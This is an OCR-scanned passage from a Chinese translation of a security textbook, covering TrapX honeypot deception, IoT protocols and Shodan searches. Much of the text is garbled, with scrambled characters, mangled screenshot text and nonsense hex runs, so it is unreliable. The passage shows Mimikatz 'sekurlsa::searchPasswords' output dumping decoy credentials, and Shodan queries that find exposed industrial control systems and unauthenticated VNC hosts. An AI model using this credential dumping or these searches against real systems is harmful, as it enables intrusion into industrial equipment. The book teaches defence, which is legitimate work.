1,618,956,254 bytes 
18,585,936,895 bytes free 


-TITITIITIII- 


AM 
B File(s) 
7 Diris} 


Optian z.p 


在 监测 和 控制 命令 


需要 查看 文件 的 静态 信息 和 信誉 评估 ， 如 图 21-17 


蕊 攻击 者 


除了 Linux 和 Windows 系 统 的 经 典 诱 饵 外 , TrapX 还 能 模拟 广泛 的 设备 , 如 Juniper 
设备 、 思 科 设 备 、 医 疗 设 备 、 物 联网 doT) 设 备 及 SCADA 设 备 ， 也 月 模拟 Swift 和 ATM 


用 的 服务 。 
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尝试 模拟 思科 交换 机 ， 如 图 21-19 所 示 ， 也 请 


留意 其 他 可 
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txaol MT on eth (10.101.1.61) x 


Workstations CI Version 


Windas Station Version Cisco Catalyst 2960 or 3600 switch IOS 12.3 


Hast name Switch3712 


Industrial jA 
SCADA Dernjicie 

Financial =O} 
‘Swift Web Platform 
Swift Lite? 
Swift Alliance Gateway 


Swit Alliance Access 


il EN 
图 21-19 ”模拟 思科 交换 机 


在 运行 思科 诱饵 时 ， 攻 击 者 可 能 通过 SSH/Telnet 与 思科 命令 行 界面 (Command 
Line Interface，CLD 交 互 。 另 外 ， 诱 饵 有 发 送 思 科 发 现 协议 (Cisco Discovery Protocol, 
CDP) 数 据 包 来 吸引 攻击 者 , 谤 使 恶意 攻击 者 与 似 真 实 假 的 Web 界 面 交 互 ， 如 图 21-20 
所 示 。 男 外 ， 在 这 个 虚假 界面 上 执行 的 所 有 操作 都 被 记录 下 来 ， 并 同安 全 运营 中 心 
(Security Operations Center, SOCHA ATIN A E R- 


ice Manag switcha? 


i PY = A 
Quem uum 全 sn qf Software uporede 过 nd Que TU 
5, li 


Uime: LE weeks, 15 hours, 47 mirabess Nest refresh In &7 seconds 


Pe 


图 21-20 与 似 真 实 假 的 Web 界 面 交 互 


另外 ，TrapX 可 与 身份 服务 引擎 (dentity Services Engine，ISE) 和 ForeScout 和 交互 ， 
使 用 网 络 访问 控制 (Network Access Control，NAC)， 将 可 疑 连 接 诱 骗 到 一 个 隔离 的 


欺骗 网 络 并 进行 进一步 分 析 。 可 参阅 本 章 的 “扩展 阅读 ” 单 击 相关 链接 , 查看 TrapX 
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BV aR eke ATE AA 


将 Wannacry 诱 骗 到 隔离 网 络 的 视频 。 


TrapX x FEX Us 2E WE Vs tH. PIU, 可 在 一 台 主 机 上 (这 里 是 fileserver004) 建 立 一 个 


虚假 的 网 络 张 动 夯 。 注 意 ， 用 户 无 法 通过 果 面 得 看 虚假 的 网 络 张 动 夯 RN， 相 反 ， 


只 有 攻击 者 可 使 用 他 们 惯用 的 命令 行 工具 查看 它 。 另 外 注意 ， 在 虚假 的 网 络 驱动 器 


上 显示 了 虚假 的 文件 ， 如 图 21-21 所 示 。 


Windows aterm 32) ond eve 


laus [Uerziam hb.1.7b58i] z FRE 7 
te) ZHU" Microsoft Corporation. All rights reserved. i et + Computer + = | # 


drganizé - Pragpeties Balam pippet Lininstall ew « Manag! d per een H i F li EF 
YE Favorites a Hard Disk Drives (1) 
E Dedbap Loca Dk [C:) 
rur TERT he partment A Dose 
" t Windows He turk x in. leh Tres of 23:5 Ot 
Filaxerwarlldulata TUTETE r E Recent Places 


epus piiiddata 
ily 


E Computer 


Ë Local bakit) 


5 D'eparirnents [i File server] ) iL:] 


Vis Hetwork 
= 
= i = 
Fig Edit Porat View Help 
administrata ; password 
user: admin 
admin; traps 
usar; password 


;sFerzaonal*sPFrisati 
mm drive E i I 
m= Serial Hunker HPC -HF 


= 458 
mi NTFS 


Lacal Desk (C:) Spa r 


图 21-21 ”虚假 的 网 络 驱动 器 


在 SOC 中 跟踪 攻击 者 的 所 有 活动 (将 虚假 的 共享 映射 到 C:data), 如 图 21-22 所 示 。 


4 Devices with Removable Storage (1 


Lad Libraries re 
= Documents GA DUD Due (D 
Ji Music = 
m] Paure 4 Network Location (1 
B veo Departments (FileSene0l) (1: 
= : 


Attack Highlights 


Hast name: 192.168.100.135 Lu SMB 445 lonnection 
IP Address 192.168.100.135 i EN -— 

Port 48209 — — — zn 

Login: ACME\steve [SMB1) P address 192 168 100 129 ngin 


ae Emulation type: Windows Server 
Start Timestamp 01/09/2017 16:09-09 os Microsoft Windows Server 2012 R2 Files 
End Timestamp: 01/09/2017 16:12:09 


Attack Details 


=r == 


i lé Connection established: from port 49.209 


+ 16:09:09 Logon: ACME\steve (SMB1) 

& 16:09-09 Connect \\WFILESERVEROO4\DATA 

i 16:09:10 Dir: CAdata 

+ 16:09:13 Dir: CAdata personal 

* 1509-15 Dir: C’\data\Personal 

* 1656:0918 Dir: CAdata Personal 

* 16:05-18 Dir: CAdata\Personal\private 

$. 160919 Dir: CAdata\Personal\Prvate 

Li l5 09-25 Die CAdata\Personal\Prvate\ passwords 1 txt 


* 16:09:26 Diz CAdataVPersonal'PrivateAPasswords 1.txt 


图 21-22 ”在 SOC 中 跟踪 攻击 者 的 所 有 活动 


13/13 Events 


c 


TrapX 也 有 基于 Web 的 其 骗 令 有 牌 ， 它 提供 三 个 等 级 的 欺骗 。 
e DREE: 攻击 者 感 兴趣 的 虚假 URL。 
e 浏览 器 凭据 : 包含 虚假 的 已 保存 用 户 名 和 密码 的 虚假 URL。 


e iai: FATALE Webby AA FEF HY fie Ba at aoe PS Se 
所 有 信息 都 是 可 配置 的 。 例 如 


, É21-23 5 T Ni d 


图 21-23 ”浏览 器 凭据 


浏览 器 数据 可 吸引 攻击 者 访问 一 个 诱饵 Web 应 用 程序 ， 如 图 21-24 所 示 。 


-D 
« 


~ O dh + Page Safety Tools i-o 


Please enter your Administrator ID and Password to manage 
accounts. 


Username 
El PME ist Pass 
EE 


Password 
L Management Home 
| ME Eid vios 


& Local intranet | Protected Mode: Off fa 


图 21-24 吸引 攻击 者 访问 一 个 谤 乌 Web 应 用 程序 


= 100% = 


返回 SOC, 分 析 师 看 到 了 警告 消息 ， 如 图 21-25 所 示 ， 没有 合法 用 户 需 要 连接 到 
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Attack Highlights d 
t Attacker LÀ Attack vector: HTTP 80 Connection 6 
Hest name: 192.168.100.135 Web - 
IP Address: 192.168 100.135 Full OS Trap te : 
Port 40208 Marre FOSDecayol Fos 
Login: N/A IP address: 192.168.100.205 HTTP 6 
Start: Today 09:20:00 Os: Microsoft Windows Server 2012 R7 
Duration: 01:01 min Emulation Trap 
Name: SEDemoAppü1 MT 
IP address: 192.168.100.129 
Os Microsoft Windows Serer 2012 R2 
Attack Details 
Category: All Action; All Contains text Q + JSON + PCAP 13/13 Events 
E 29.08.2017 09:20:00 File Create File Path: C:\inetpub\logs\LogFiles\W3SVCL\u_ex170829.log 
* 29,08,2017 09:20:00 Connection Establish Connection 192.168.100.205:80 (Web) 
29.08.2017 09:20:00 HTTP GET URL: http;'/fileserver004:80/ 
(&) 29.08.2017 09:20:00 HTTP GET URL: http;/fileserver004:80/index htm 
(&) 29.08.2017 09:20:00 HTTP GET URL: httpz//fileserverD04:80/home files/gem3000.css 
m) 29.08.2017 09:20:00 HTTP GET URL: http-//fileserverDO4:80/home files/browser.js 
+ 29.08.2017 09:20:01 Connection Establish Connection 192.168.100.205:80 (Web) 
+ 29.08.2017 09:20:01 Connection Establish Connection 192.168.100.205:80 (Web) 
@) 29.08.2017 09:20:01 HTTP GET URL: http:'/fileserver004:80/home_files/versionjs 
E 29.08.2017 09:20:01 HTTP GET URL: http;"/fileserver004:80/home_files/clear.gif 
* 29,.08,2017 05:21:01 Connection Close Connection 192.168.100,205:80 (Web) 


图 21-25 ”分 析 师 看 到 了 警告 消息 


TrapX 最 先进 的 功能 之 一 是 能 够 将 命令 安全 地 代理 到 完全 运行 的 系统 ， 从 而 提 
供 最 高 级 别 的 仿真 效果 。TrapX 将 这 称 为 全 运行 系统 (Full Operating System, FOSA 
饵 。 例 如 ， 攻 击 者 可 使 用 钓鱼 电子 邮件 获得 一 个 并 足 点 ， 然 后 找到 故意 布置 的 欺骗 
令 牌 信息 ， 通 过 运行 远程 更 面 协议 Remote Desktop Protocol, RDP) HK I AFRE. 
攻击 者 甚至 可 能 运行 Mimikatz， 如 图 21-26 所 示 ， 自 认为 获得 了 真正 的 凭据 。 


= respDurcg scripts/4.rc 
. Reading / ret /Desktop/scripts/4.rc 
*] Running load mimikatr 


dading extension mimikatz.. SUCCESS, 
Bunning mimikatz comand -f sekurlsa::searchPascwords 


dcBrzB20la 30 3b8 74 5e Te TB16cdo els 3c Boe TAROT OSE 7d T CG TET Te T5aeD T atob6 Tct337 boc? 3a Ba athbe^c HE TaT45607 4284 d00bd9dBOd.c CABO BT ea 3BH99edde 30 Ladc Seb 792 f Toabdd 329 lB6 Ba? Spo? Tao ORS cede 8 315eebdbSTdeb6 T9 bd 


[8] ( ALME-VICTIMS ; ACHE ; 
Wie TARE 2020711376 783cB2 f Te 131692232 16b 180562813857 7215cdd 3890110560524 14290402 Te3bf eaSO8ccSceS f 466cBdd58Te 1117 db&aSBa Sc? Feci 33TeTdlabf c2 Tad 


FbB27876Ba7 cB adl Teadda2d77d4902320324b434 Db Lac 199a 743 f PGS fÜca 788 3e Tdc51B807 a6 3aal5636e 314 FhceaBe3 

531B5bBbeord 5713 } 

[1] 1 acme- victims ; MME.LlOCAL ; d3cE4ZB2BIl'8383bBTA5eTeTHIGcdb37e7 set Sib :cBbe Tdi] P5ObU Td f cb le? 1e158e9Ta5565f ch537 Locz2T5a5B46abbbe s 2427 l'afASbco T a4 284 dDObdOdEO c cad BEN SB l'an T 38996Lde 30 Lind eb 797 f T56a5dd5 20 D6TEAT Se DOd7 reed 18d 3 5eebdb5T: 

m: ZT aT Gia? Tchad TeakdaZd? T14d9928293245434 Lb Ladd La TAF f968fBca 7803 fe Tdch 18677263aa05636e3]14 fbceaB63de970cB58f 202871 f 37e T03cB2 tfel3lbüaad3af 16518856208 138272 215cdd389c 11054524 14290402 Te 3bfeaSODccSce5 f 406c046d58Te1117?db8a5BaScz2 fecB337e Td lab 
531 ER 


ACME-VICTIM$& ; ALME ; d:3cBELZEZOlE3XGGbBTASe TeTB16cdo37e7 3dedBBb3cBOeTdBOTbObU TdT cole? lel beef abob6 T ch33T Ic c2T3a5BA6atbbeSc242 2 Taf A5bc T ad 204 OUO IO HBUU cae ear elde 90 Ladc Seb 02 F T6acdd520F 76 Haz 5epod2 35 7 ad 7085 3cedc 1843 L5eebdb5 f debo fO Sbd- 


— 0 e 4b4341bLadd 1993:743f FOGOfOCcaTEO3f e TdcO 1882 7a63a20563663]4 fhceaB63deg TOcBSB 2028 T1 f 3Te TO3CR f fe 13109224 tat 16b180562d813852 7 215cdd 38911858524 14290102 Te3b feas OOccS ces f 468cOd6d587e 111 TdbBaS8aS c2 Feci 33Te TdLabf c2 ad 


{ steve | APE ; Pas peel 

{ WT s SERVICE i Audios ; CE 3792606 40584 f0B932e 1a361946 } 
| ACME ; steve ; tation 
[| ALME ; will ; Paiswcrd'l p 
[ will ; ACME ; Passwenrd'l!] 
| mcme-vilc tim ; ACME LOCAL ; d3cBEL2B26f8303b87452 7e 7815c0637273de4 B6 Xc Bee fae be Td f CETT 1e 15269 f ab5S66 f ch537 Lcc2 1 53a5 debba c 24027 Fa fd bc Tad edb dB Oc cAd Be 5B Fea 3869cLde 30 lade Reb 732 f TGa&ckd PORE Ba? Sed? 157 38 7085 3c ed c 18d 315eebdb5 f deb 


Po5bd4 FbHZTHTBEaT cB dil Teabrdin2d7 Td R20 324b4 34 1b Lad4 199287437 f969fBcaT]U0 Fe TdcB 1887 a6 tae S6 36e 114 bora 3de J TUcBSB f 202871 f 3Te TE ScEG f fel 31h04 3a f 16b 18056208 138h27215cdd ec 11054524 179647 1e 35 Fea OB c5ce5 Fabia Te 1117dbBRa58a5c? ecl T 37e Td Lab 
Ilmwih31lBObObed^li b 

LEM. ; ACME. LOCAL ; Password!l) 

[1B] [ will ; APE ; Password!l]) 

*] Bunning background 


*] Backgroundimg session 2... 
sf exploit! 


图 21-26 ”攻击 者 甚至 可 能 运行 Mimikatz 


如 图 21-27 所 示 , 恶意 攻击 者 此 后 可 能 使 用 这 些 盗 来 的 凭据 与 全 面 运 行 的 伪 系 统 
建 了 YRDP 会 话 。 这 个 伪 系 统 存在 的 唯一 上 日 的 就 是 等 待 访问 ， 然 后 给 SOC 分 析 师 提供 
警告 信息 ， 这 与 前 面 定 义 的 蜜 饶 是 匹配 的 。 
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E | Registry Editor 
rie Edi 
4 JE Computer Harme Data 
» -图 HKEY CLASSES ROOT ab) (Default) (value not sat) 
à i HKEY CURRENT USER. Sli TrapXString BadStuff 
" " AppEverts 
»- Console 
>) Control Panel 
p" Enviranrnent 
» i EUDC 
b " Keyboard Layawt 
由 Naetwwark 
E J Printers 
b & Remate 
E " Sofware 
3 w” System 
b 起 Volatile Ervaronenent 
E TrapXDemokey 
p- HKEY LOCAL MACHINE 
p- HKEY LISERS 
b 点 HKEY_CURRENT_CONFIG 


CormputemHREY CURREMT, LUISERATrapXDernaksy 


图 21-27 ”建立 RDP 会 话 


恶意 攻击 彰 可 能 不 知 追 这 是 一 个 密 钱 (因为 它 是 全 运行 系统 )， 目 认为 已 经 获得 
了 系统 的 完全 访问 权限 。 其 实 ， 恶意 攻 击 者 的 活动 全 部 处 于 SOC 团 队 的 视野 范围 内 ， 
如 图 21-28 所 示 。 
SS eS E 


Attack Highlights 

x Attacker LJ Attack vector. RDP 3389 Connection 18 

Hest name: 132 158.100.135 RDP 

IP Address: 192.168.100.135 Full OS Trap Process 14 

Port: 49246 Mame: FOSDecoyO1 FOS - 

Login: ACME\WILL IP address 197 156810005 Registry g 

Start: Today 09:55:24 Os Microsoft Windows Server 2012 R2 

Duratian: 05:35 min Emulation Trap File 3 
Harrie SEDemcApp0L_MT 
IP address 192.166.100.129 
Os Microsoft Windows Server 2012 Rz 

Attack Details 

Category: All ^W || Action: All "/ . Contains text Q JSON | + PCAP 44/44 Events 

. 29.08.2017 03:55:24 Connection Establish Connection 192.168.100.205:3383 (RDP) 

i) — 29.08.2017 09:55:33 Process Start Process C\Windows Explorer. EXE 

* 29.08.2017 09:55:35 Connection Establish Connection 192.168.100.130:389 (LDAP) 

* 29.08.2017 09:55:35 Connection Close Connection 192.168.100.130:389 (LDAP) 

(s) 29.08.2017 09:56:20 Process Start Process "C'Windowsksystem32eomd exe" 

二 | 29.08.2017 09:56:34 Process Stop Process cmd.exe 

(=) 29.08.2017 09:57:14 Process Start Process "C:\Windows'\regedit.exe” 

(=) 29.08.2017 09:57:14 Process Stop Process regedit exe 

i) — 29.08.2017 09:57:17 Process Start Process "C\Windows\regeditexe” 

í($) — 29082017 09:58:22 Registry Create Registry Key Key: HKEY_CUIRRENT_USER\New Key #1 

(i) 29.08.2017 09:58:40 Registry Rename Registry Key New Key: TrapxDemoKey; Key: HKEY CURRENT USERYNew Key #1 


Kl21-28 SOC 团队 可 以 看 到 恶意 攻击 者 的 一 切 活 动 


可 以 看 到 ， 商 业 产 品 功能 完备 。 通 过 阅读 上 述 内 容 ， 资 质 将 可 以 根据 自己 的 需 
要 ， 更 好 地 进行 选择 ， 可 以 酌情 挑选 开源 产品 或 商业 产品 。 
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第 IV 部 分 “高 级 亚 意 软件 分 析 
21.4 RhA 


本 章 讨 论 的 主题 是 欺骗 ， 这 个 主题 与 使 用 密 钢 技术 进行 网 络 防 御 相 关 。 本 章 首 
先 从 总 体 上 论述 其 骗 和 密 饶 的 历史 ， 然 后 讨论 现代 密 饶 的 类 型 以 及 在 部 署 时 需要 考 
虑 的 事项 。 此 后 使 用 最 新 的 开源 密 鲸 工具 完成 了 一 系列 实验 ， 最 后 分 析 商 业 解 诀 方 
案 TrapX， 并 列举 了 一 个 示例 。 


TAT RAZA d 
TG KAS UE 
反 制 物 联网 恶意 软件 


p22% 攻击 目标 : 物 联网 


本 章 介 绍 与 互联 网 连接 的 物 联 网 (Internet of Things，IoT) 设 备 。“ 物 联网 ”一 
词 由 Kevin Ashton 于 1999 年 在 兵 省 理工 学 院 召 开 的 会 议 上 最 早 提 出 。 在 2008 年 ， 
连接 的 IoT 设 备 的 数量 达到 80 亿 之 多 ， 超 出 了 地 球 上 的 人 口 数量 。 因 此 ， 这 些 设 
备 的 安全 变 得 日 趋 重要 。 连接 的 IoT 设 备 的 数量 增 速 惊人 。 思 科 公 司 预 测 , 到 2020 
年 ，IoT 设 备 的 数量 将 超过 500 亿 。 试 想 一 下 ， 到 那 时 ， 人 均 拥有 的 此 类 设备 将 超 
过 8 台 。 这 类 连接 设备 正在 控制 人 类 的 生活 ， 甚 至 影响 到 大 众 的 行为 。 用 户 应 当 
有 防范 心理 , 如 果 这 些 设备 配置 错误 , 设计 不 佳 或 仅 使 用 默认 凭据 连接 到 互联 网 ， 


将 会 对 旦 无 戒心 的 用 户 造成 重大 安全 风险 。 因 上 此， 理解 IoT 设 备 的 安全 风险 至 关 
重要 。 
本 章 涵盖 的 主题 如 下 : 


e lol(Internet of Things， 物 联网 ) 
e Shodan IoT 搜 索引 擎 
e ToT: 只 是 时 间 问 题 


22.1 lol 


WREE, WORM See REKNAR: 而 这 正在 成 为 现实 。 如 本 
草 所 述 ，IoT 设 备 的 安全 行动 已 经 落后 一 步 。 其 正 令 人 候 惧 的 是 ,用户 经 划 为 图 方便 
而 物 牲 安全 ， 对 物 联网 安全 的 关注 程度 达 不 到 业内 安全 人 士 所 期 望 的 程度 。 


221.1 连接 设备 的 类 型 


连接 设备 的 类 型 有 多 种 : ALE KRA, WL IAA; qim ME. Ust 
入 式 医 疗 右 械 。 较 小 设备 的 内 存 、 处 理 能 力 和 功 耗 也 小 ， 限 制 了 安全 控制 。 电 源 包 
括 电 池 、 太 阳 能 、 射 频 RF) 和 了 网络。 电力 受 限 对 安全 控制 措施 (如 加 窗 ) 构 成 直接 威 
胁 ， 远 程 小 型 设备 尤其 如 此 。 物 联网 设备 在 设计 时 认为 安全 控制 过 于 昂 贯 ， 功 耗 明 
显 ， 因 此 根本 不 予 考 虑 。 

由 于 篇 幅 所 限 , 此 处 无 法 包罗 所 有 连接 设备 ; 仅 列 出 其 中 一 些 可 能 的 安全 问题 ， 
供 你 考虑 。 


第 V 部 分 物 联 网 


智能 类 设备 : 智能 家 寿 、 智 能 设备 、 智 能 办 公 、 智 能 建筑 、 智 能 城市 、 智 能 
电网 等 。 

可 穿戴 设备 : 运动 监视 设备 ， 比 如 健身 和 生物 医学 可 罕 戴 设备 (例如 ， 包 合 
触摸 支付 与 健康 监控 选项 的 智能 设备 )。 

交通 运输 与 物流 : REFID 收 费 传感器 、 货 物 跟 踪 、 对 生产 和 医疗 流体 (例如 ， 
血液 和 药品 ) 进 行 冷 链 验 证 。 

汽车 行业 : RERE, AE. BIA ee. 

制造 业 : RFID 供 应 链 跟 踪 、 机 器 人 装配 和 零件 验证 。 

医疗 保健 : 健康 跟踪 、 监 测 和 药物 递送 。 

Wize: REFID 部 件 跟 踩 (真实 性 )、 无 人 机 控制 和 包 庄 递送 。 

电信 : 使 用 GSM、NEFC、GPS 和 蓝牙 连接 智能 设备 。 

Ahh: 远程 医疗 、 紧 急 抢 救 和 地 理 围 栏 (Geo-Fencing)。 

农 牧 畜 : BOLE, ERRE AMEME, AiE, FREMMER 
感 器 。 

能 源 行业 : RERE, MT ai SEMAT. 


22.1.2 “无线 协议 
大 多 数 连接 的 设备 都 采用 某 种 形式 的 无 线 通信 。 无 线 协议 包括 以 下 种 类 。 


MES. 蜂窝 网 络 (包括 GSM、GPRS、3G 和 4G) 用 于 远程 通信 。 对 于 建筑 物 、 
汽车 和 智能 手机 之 间 的 连接 ， 这 种 节点 之 间 的 长 距离 通信 效果 不 错 。 和 截至 撰 
写本 书 时 ， 此 类 通信 仍然 是 最 安全 的 选择 ， 难 以 被 直接 攻击 。 不 过 ， 可 能 出 
现 网 络 拥塞 。 

Wi-Fi: 备 受 推 深 的 下 EE 802.11 协 议 已 经 出 现 了 数 十 年 ， 为 人 熟知 。 当 然 ， 

Wi-Fi 的 很 多 安全 问题 也 人 尽 赂 知 。 此 类 通信 已 成 为 连接 设备 进行 中 程 通 信 
的 事实 标准 。 

Zigbee: IEEE 802.15.4 协 议 是 短程 至 中 程 通 信 的 流行 标准 ， 通 单传 输 距 离 最 
大 为 10 米 ， 有 些 条 件 下 ， 可 达 100 米 。 该 协议 在 低 功 耗 要 求 的 应 用 环境 中 非 
th AA. 该 协议 文 持 网 格 化 网 络 , 允许 中 同市 点 同 远 程 节 点 中 转 消 居 。 Zigbee 
在 2.4 GHz 范 围 内 运行 ， 与 Wi-Fi 和 蓝牙 存在 频道 冲突 。 

Z-Wave: Z-Wave 协 议 也 是 用 于 短程 至 中 程 通 信和 的 流行 标准 ， 因 为 频率 较 低 
(在 美国 为 908.42 MHZz)， 从 而 履 闸 了 更 大 的 通信 范围 。Z-Wave 与 Wi-Fi 和 痢 
牙 等 其 他 第 见 无 线 协议 的 频率 范围 不 同 , 不 存在 竞争 关系 , 受到 的 干扰 较 小 。 
WU: 无 所 不 在 的 蓝牙 协议 经 历 了 更 新 ， 以 低 功 耗 (Low Energy, LE) FIV 
形式 重生 ， 成 为 一 个 可 行 的 选项 。 BREE TRA, (ATA, AN 
认为 该 协议 具有 “智能 性 ”。 与 Zigbee 和 ZZ-Wave 一 样 ， 师 牙 和 低 功 耗 蓝 牙 不 
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能 直接 与 互联 网 通信 ， 而 必须 通过 网 天 设备 (如 和 镶 能 手机 或 镶 能 桥 / 控 制 礁 ) 

e 6LoWPAN: 6LoWPAN(low-power Wireless Personal Area Networks， 低 功 耗 
无 线 个 人 区 域 网 ) 上 的 IPv6 通 信 正 成 为 一 种 在 802.15.4(Zigbee) 网 络 上 传递 
IPV6 数 据 包 的 有 价值 方式 。 由 于 可 在 Zigbee 和 其 他 形式 的 物理 网 络 上 传输 ， 
它 与 Zigbee 和 存在 竞争 关系 。 但 因为 它 允 许 与 连接 到 IP 的 其 他 设备 联系 ， 所 以 
也 有 人 认为 二 者 是 互补 的 天 系 。 


22.1.3 ”通信 协议 


物 联网 有 多 种 通信 协议 ， 无 法 一 一 列举 。 这 里 只 列 出 常用 的 几 种 : 

e 消息 队列 遥测 传输 (Message Queuing Telemetry Transport. MQTT) 

e 可 扩展 消息 与 存在 协议 (Extensible Messaging and Presence Protocol, XMPP) 

e 实时 系统 数据 分 发 服务 (Data Distribution Service for Real-Time Systems, 
DDS) 


Ed 


e 局 级 消 恩 队列 协议 (Advanced Message Queuing Protocol, AMQP) 


2214 安全 方面 的 考虑 事项 


传统 意义 上 的 机 黎 性 、 完 整 性 和 可 用 性 观点 适用 于 IoT 设 备 , 但 方式 往往 有 上 所 不 
同 。 在 连接 传统 的 网 络 设备 时 ， 优 先 考 虑 机 密 性 ， 再 考虑 完整 性 ， 最 后 是 可 用 性 。 
而 在 连接 IoT 议 备 时 ， 顺 序 正 好 相反 ， 优 先 考 虑 可 用 性 ， 再 考虑 完整 性 ， 最 后 是 机 密 
性 。 考 虑 一 下 磐 入 式 医 疗 设备 通过 监 直 连接 到 用 户 手机 后 连接 到 互联 网 的 场景 ， 采 
用 这 种 模式 容易 让 人 理解 。 前 先 考 虑 可 用 性 ， 然 后 是 完整 性 和 机 密 性 。 设 想 一 下 ， 
在 我 们 探讨 医疗 机 密 信 息 时 ， 如 果 设 备 无 法 触及 或 不 被 信任 ， 考 虑 机 密 性 就 没有 
意义 。 
不 过 ， 还 有 其 他 一 些 安 全 方面 的 考虑 事项 : 
e 很 难 (甚至 无 法 ) 修 补漏 洞 。 
e ERT BR ii 了 资源 和 功率 ， 通 第 不 文 持 加 密 等 安全 控制 措施 。 
e 和 缺少 用 户 界 面 ， 使 设备 “看 不 到 ， 想 不 起 来 ”。 离 线 时 间 往 往 长 达 数 年 ， 拥 
A) LF GER WR) S IN AFEE 
e MOTTSHMAA e DR. GENEI RE, Ze AT aE, ZAC 
置 不 合理 等 ， 稍 后 会 介绍 。 
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222 Shodan loT 搜 索引 区 


Shodan IoT 搜 索引 擎 专用 于 与 互联 网 连接 的 设备 ， 在 物 联网 领域 正 逐 渐 为 人 所 
知 。 必 须 认识 到 ， 这 并 不 是 历史 悠久 的 Google。Shodan 搜 索 系 统 提 示 信 息 (Banner)， 
而 非 网 页 。 确 切 地 讲 ，Shodan 在 互联 网 上 搜索 认识 的 系统 提示 信息 ， 然 后 给 数据 编 
制 索引 。 可 提交 自己 的 系统 提示 信息 指纹 Banner Fingerprint) 和 IP( 需 要 付费 才能 获得 
许可 )， 供 他 人 搜索 。 


22.2.1 WebAH 


TR SAB BP EES AAR SE TB], nf EA; Ay https://images.shodan.io(Z 
获得 访问 资格 ， 需 要 交纳 年 费 949)。 或 许 ， 你 会 看 到 一 个 疲惫 不 堪 、 伏 地 打 睹 睡 
成 年 人 ， 如 图 22-1 所 示 。 


RTSP/1.0 200 OK 
| CSeq: 1 
] Server: Hipcam RealServer/V1.@ 
= Public: OPTIONS, DESCRIBE, SETUP, TEARDOWN, PLAY, SET. PARAMETER, GET, PARAMETER 


£01?7-11-06 16:37:53 


122-1 访问 https://images.shodan.io 


不 开玩笑 ， 言 归 正 传 。 可 使 用 字符 串 “authentication disabled” 进 行 搜索 ， 并 通 
过 VNC 进 行 过 小， 你 将 会 看 到 更 有 趣 的 结果 (注意 Motor Stop 按 钮 )， 如 图 22-2 所 示 。 

如 果 对 工业 控制 系统 (Industrial Control System, ICS) 感 兴趣 , 并 正在 但 找 不 怎么 
第 见 的 服务 ， 使 用 搜索 字符 串 “category:ics -http -html -ssh -ident country:us”， 你 将 
看 到 如 图 22-3 所 示 的 结果 。 
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RFE 883,008 
authentication disabled 


| FernANartundg 
Wartung in Wasser EIM aktiv r ALIS Gasvordruck Aufstellhaáhe 
30 | h fro | "C Fenster schlieBen D "C aso — N.N. 
Gemisch 
Ladedruck 
Ist 


tr 
四 
一 


Ladedruck 
Soll 


AMG Display- 


Motor Kontrolle 


MOTOR gerta 1 | 
START B5 KW 

G 100% Reduzier 2 
Leistung 65 KW 


| 4 MOTOR MOTOR 
| 9 sTop 9 NoTAUS | 


Betrieb: 
AUTO 国 


ÜBERSICHT D KW 


图 22-2 PARIAR 


SHODAN ategonclcs -http -himi -ssh -ident countrys ü Explore Downloads Reports I Contact Us 


va Exploits as Maps % Share Search + Download Results lul Create Report 


TOTAL RESULTS 173.236.81.114 
T3238. 81.114, 8inglshiop com 


208,166 SingisHop 


j on 2017-11-12 13:1 E GM 
ES United Stains, Chicago 
[Detail 


TOP COUNTRIES 


A ET v PT wl asd BhinL H TS EN Z2 Sn c RPM nn nA Pb VW cobm T o oo P ac P c BEA oA oo c FECE Poo Pda P FE bi ac EXER o P^ oed v oa 
Smee BT vac EF cB BB ad Vx 145 xe Ba xcd" sxET xaz ooa xb xBIB:E xis 3x DA ESRB Cod Bd v BS D^ aed Toca 


209.193.70.95 
United States 208,1 sU- TRO- 0-95. anammotihneiworks. com Ubiquiti Networks Device 

Added on 267] IP; 208,193.78.95 
TOP CITIES j MAC: 58:72:51:47: 13: Ff 
Alternate IP: 192,188,.1.1 
Alternate HAC: B8:72:51:46:13:fF 
Hostname: AirRouter 


Redwood City 
Now Work 


Minneapelis Product: LAP 


Miami Version: XH.ar7248.v5,6.2. 27029,150716,1201 
Las Angeles 


TOP SERVICES 184.154.5.34 

184. 154. 5.34. singlahop.com 
Authored Tank Gauge 

SingleHap 
OMRON FINS Addad on 2017-11-12 12:13:58 GMT 
Tridium Fax EE Uniled States, Chicago 
aura 


BACrat 
ocio vc B T Lot ead BppF yo Doyen sx E ad SVHiln: dztz&dtbT dud E13 t od oed DE Ree A Ec PED Pod FF Foch oc BSEC oo oe oc 


Nai eb i ee BB c uc Pc Fave vadsxEesx1b6P xaT xdi i xas xr xudi'xdüeva VC B: xd xBT EB CBE ÉE | nara 
TOP ORGANIZATIONS 


inzapzuia 
Comcast Business 107.154.246.2 

Verizon Wireless: | 107 ip.incapcrs nat 
Medicom Gabe 2017-11-12 19:1 X52 GMT 
Cogent Communications BE Uniind Stains, Rocwood City 


图 22-3 ”得 到 的 结果 


从 这 个 视图 可 看 到 ， 除 了 HTTP、HTML、SSH 和 IDENT 等 常见 服务 外 ， 还 有 超 
过 200 000 个 ICS 服 务 正 在 运行 。 另 外 ， 可 以 看 到 托管 这 些 ICS 服 务 的 最 帝 见 的 城市 、 


pan 
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顶级 服务 和 顶级 机 构 。 当 然 ， 需 要 进一步 进行 过 滤 ， 排 除 蜜 雌 ， 稍 后 将 进一步 讲述 。 
如 果 想 以 报表 格式 显示 该 数据 ， 可 生成 免费 报表 ， 如 图 22-4 所 示 。 


elf Cattle 
L^ HIDAN | Faphwe cet Papo Poe doce Gonad Ile d Wy doco 


ICS in US 


Top Cities 


6, Winter Park 


图 22-4 ”以 报表 格式 显示 数据 
2222 4622-1: 使 用 Shodan 命 令 行 工具 
如 果 更 喜欢 使 用 命令 行 工具 ，Shodan 也 不 会 让 你 失望 。Shodan 提 供 了 功能 完备 
且 优 秀 的 命令 行 工 具 。 


注意 : 本 章 中 的 实验 是 在 Kali Linux 2017(32 位 ) 上 完成 的 ,但 也 适用 于 其 
Vos 他 版 本 的 Linux。 另 外 ，Shodan 需 要 一 个 API 密 钥 ， 可 以 在 注册 账户 后 免 
费 获 得 。 


本 实验 将 探索 Shodan 命 令 行 。 使 用 easy_install 安 装 工具 集 ， 如 下 所 示 : 


root@kali:~# easy install shodan 

Searching for shodan 

Best match: shodan 1.7.5 

Adding shodan 1.7.5 to easy-install.pth file 


Using /usr/local/lib/python2.7/dist-packages 
Processing dependencies for shodan 
Finished processing dependencies for shodan 


人 然后， 初始 化 API 密 铀 : 


root@kali:~# shodan init 9G19LLaQUJCWrlEOFNDGUY-MASKED 
Successfully initialized 


接 下 来 ， 测 试 账 尸 中 的 可 用 额度 : 
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root@kali:~# shodan info 
